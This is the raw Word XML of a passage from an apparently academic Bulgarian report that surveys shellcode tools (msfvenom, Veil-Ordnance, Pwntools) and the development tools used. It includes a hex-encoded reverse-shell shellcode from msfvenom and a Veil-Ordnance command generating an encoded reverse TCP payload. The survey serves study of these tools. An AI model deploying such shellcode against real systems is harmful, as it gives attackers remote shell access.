    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>"\xff\xff\x48\xbb\xda\x82\x86\xfd\xf9\x70\x28\x66\x48\x31\x58"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x92\xb3\x79\x97\xf0\x28"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>"\xb1\xd0\xca\xca\x0f\x2b\xb4\x41\xe1\x0c\xf8\xc3\xdc\x4f\xfe"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>"\x7f\x2d\x2e\x5f\x42\xfe\xaf\x93\x7a\x69\x3f\x8c\xd2\xec\xd4"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>"\xa1\xe9\x42\x64\x85\xe8\x87\xa3\xf6\x75\x60\xe3\x1a\xfa\xbd"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>"\xb5\x6e\x38\x91\x64\xda\xa5\x97\x3d\x51\x70\x23\x37\x92\x0b"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>"\x60\x97\xe9\x2a\x42\x4c\x82\x8d\x83\xa4\xb1\xf5\xe8\x1f\xff"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>"\xcb\x79\x34\x8d\x68\x7f\x0c\xf9\xda\xec\xfd\x93\x75\x60\xef"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>"\x3d\xca\xb7\x0b\xf6\x75\x71\x3f\x85\xca\x03\x3d\x80\xb7\x42"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>"\x5a\x82\xe8\x87\xa2\xf6\x75\x76\x3c\xd5\x87\xce\x78\x39\x08"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>"\xc7\x99\x3c\x82\x86\xfd\xf9\x70\x28\x66";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRDefault="005F56EB" w:rsidP="00303E70">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: reverse shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">От обобщението се вижда, че шелкодът е с размер 175 байта, форматиран за C код, което е идеално за тестване. Ако го поставим в теста </w:t>
      </w:r>
      <w:r w:rsidRPr="000878DE">
        <w:t xml:space="preserve">от т. </w:t>
      </w:r>
      <w:r w:rsidRPr="000878DE">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="000878DE">
        <w:instrText xml:space="preserve"> REF _Ref2190565 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidRPr="000878DE">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:t>2.5.4</w:t>
      </w:r>
      <w:r w:rsidRPr="000878DE">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">, компилираме без защитите </w:t>
      </w:r>
      <w:r>
        <w:t>(описано</w:t>
      </w:r>
      <w:r w:rsidRPr="000878DE">
        <w:t xml:space="preserve"> в т. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref2190617 \r \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:t>3.3</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="000878DE">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> и използваме сървъра от т. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="magenta"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref2190635 \r \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="magenta"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="magenta"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:t>2.5.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="magenta"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>се вижда, че шелкодът работи, както се очаква.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Запознаването с останалите опции е лесно заради добрия дизайн на целия комплект - описателни грешки и помощни команди. По-подробно обяснение можда да бъде намерена в книгата “Етично хакерство”</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> NOTEREF _Ref2193869 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Комплектът не е без своите проблеми. Някои от модулите се затрудняват в изпълнението на предназначението си, както се вижда от тестването на маг. инж. Илия Дафчев</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00112660">
        <w:endnoteReference w:id="31"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>. Също така интерфейсът подлежи на разширяване, но проектът е много голям и има много специфики. Освен това самите реализации обикновено се базират на готов байтов код, който трудно може да бъде променен при нужда.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="93" w:name="_13d4m9m39iix" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="94" w:name="_Toc3540784"/>
      <w:bookmarkEnd w:id="93"/>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>Veil-</w:t>
      </w:r>
      <w:r w:rsidRPr="008227E1">
        <w:t>Ordnance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="94"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Този малък инструмент е част от рамката Veil-Framework. Според авторите в хранилището на проекта</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00112660">
        <w:endnoteReference w:id="32"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> неговата цел е да се създаде инструмент, който да не променя поведението си неочаквано за програмна употреба. Инструментът копира функционалностите на msfvenom, като основна разлика е езикът - python. Наистина, интерфейсът е удобен за употреба и се предлага обвивка, която облекчава разработчиците, например за детайли като потребителски вход. Той работи като параметризира предварително зададени и цялостни шелкод реализации. След това има способността да ги кодира чрез различни методи.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Инструментът поддържа 6 различни шелкод реализации и 1 метод за кодиране, адаптирани от Metasploit. Също така, последната разработка по него е от преди 4 години и си личи, че не е завършен - функционалност като поддръжка на множество архитектури не е достъпна за потребители. Това го прави неизползваем за ежедневна употреба. Освен това всички шелкод реализации там са абсолютно копие на тези в metasploit и така общността за информационна сигурност няма причина да развива този проект.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Аргументите, които приема са много малко и са глобални за целия инструмент (дефинирани във Veil-Ordnance/common/helpers.py). Те са:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>-p за избор на товар</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>--ip за задаване на ip адрес на товара</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>--port за задаване на порт на товара</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>-e за избор на кодиране</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>-b за задаване на непозволени комбинации</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00112660">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Примерна команда:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>./Veil-Ordnance.py  -p rev_tcp --ip 127.0.0.1 --port 1234 -e xor -b \x00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>която генерира шелкод с дължина 319 байта. При тестване като това в предната глава виждаме, че шелкодът отново работи очаквано. С добавяне на опция --print-stats, могат да се види обобщение на резултата:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>Payload Type: rev_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>IP Address: 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Port: 10001</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Encoder Name: Single byte Xor Encoder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Bad Character(s): 0x0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Shellcode length: 319</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Xor Key: 0x5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>[шелкодът е пропуснат]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRDefault="005F56EB" w:rsidP="00303E70">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="_83ng1qqa3j5d" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="95"/>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">Обобщение на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>след генериране</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="96" w:name="_Toc3540785"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>Pwntools</w:t>
      </w:r>
      <w:bookmarkEnd w:id="96"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Pwntools е библиотека за python. Оригинално е използвана в “capture the flag” състезания. Тя предоставя помощни средства за бързо писане на шелкод изцяло в python среда. Включени са полезни инструменти като асемблиране и деасемблиране на единични инструкции или байтове. Изложените функции са предназначени за ръчно писане на шелкод. Покриват някои действия като системни функции и индивидуални инструкции с подходяща параметризация. В този си вид е удобен за създаване на скриптове, които използват функционалностите на шелкод, а не за обикновено генериране, както предишните два инструмента.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="97" w:name="_lfctn08qdzjz" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="98" w:name="_Toc3540786"/>
      <w:bookmarkEnd w:id="97"/>
      <w:r w:rsidRPr="00112660">
        <w:t>Използвани на инструменти</w:t>
      </w:r>
      <w:bookmarkEnd w:id="98"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="99" w:name="_dw8a1tz6jj38" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="100" w:name="_Toc3540787"/>
      <w:bookmarkEnd w:id="99"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>python</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Python е скриптов, интерпретиран език от високо ниво с динамична типова система и автоматично управление на паметта. Главни особености са изчистеният синтаксис и строгата идентация. Това го прави идеален за бърза разработка и лесни промени, със своевременно спазване на стандарти за качествен код. Освен това богатата му вградена библиотека улеснява голяма част от работата.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Скриптовите езици са чест избор при писане на автоматизации заради бързата разработка. Изборът на конкретен език, например python, ruby, perl… обикновено се свежда до езика, с който авторът е най-добре запознат.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="101" w:name="_cd9hqtdljq8k" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="102" w:name="_Toc3540788"/>
      <w:bookmarkEnd w:id="101"/>
      <w:r w:rsidRPr="008227E1">
        <w:lastRenderedPageBreak/>
        <w:t>GNU</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> toolchain</w:t>
      </w:r>
      <w:bookmarkEnd w:id="102"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>GNU compiler collection (GCC) и GNU binutils са част от свободния “toolchain” лицензиран с GNU GPL лиценз. Заедно те представляват комплект от инструменти, подходящи за цялостна разработка на различни езици, като C и C++ на операционни системи, като Linux и Mac OS X на огромен набор от платформи, като x86, arm и powerpc. Те са едни от най-разпространените в open-source света и са стандартни за проекти като Linux и Mozilla Firefox, които отскоро започват да поддържат алтернативи като clang/llvm.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Даже самият Линус Торвалдс създава клон (port)</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00112660">
        <w:endnoteReference w:id="33"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> на GCC за своята операционна система.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>GNU и GCC са част от Linux още от неговото зараждане и са неразделна част от всяка една Linux дистрибуция. Тяхната философия за свобода ги прави де факто стандартни за света на отворения код и са естествени за всеки потребител в сферата. Затова тяхната употреба е логична стъпка при разработката в Linux. Това, че е наличен по подразбиране в средите на разработчиците, прави средата по-лесна за настройване и няма нужда от учене на нови инструменти.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="103" w:name="_j53zcuk76xp7" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="104" w:name="_Toc3540789"/>
      <w:bookmarkEnd w:id="103"/>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Диалект на </w:t>
      </w:r>
      <w:r w:rsidRPr="008227E1">
        <w:t>асемблер</w:t>
      </w:r>
      <w:bookmarkEnd w:id="104"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>GNU Assembler (GAS) поддържа много асемблерни езици. Някои от тях, като x86 и amd64 имат 2 разпространени синтаксиса - Intel и AT&amp;T. Intel използват своя синтаксис в наръчниците си</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00112660">
        <w:endnoteReference w:id="34"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
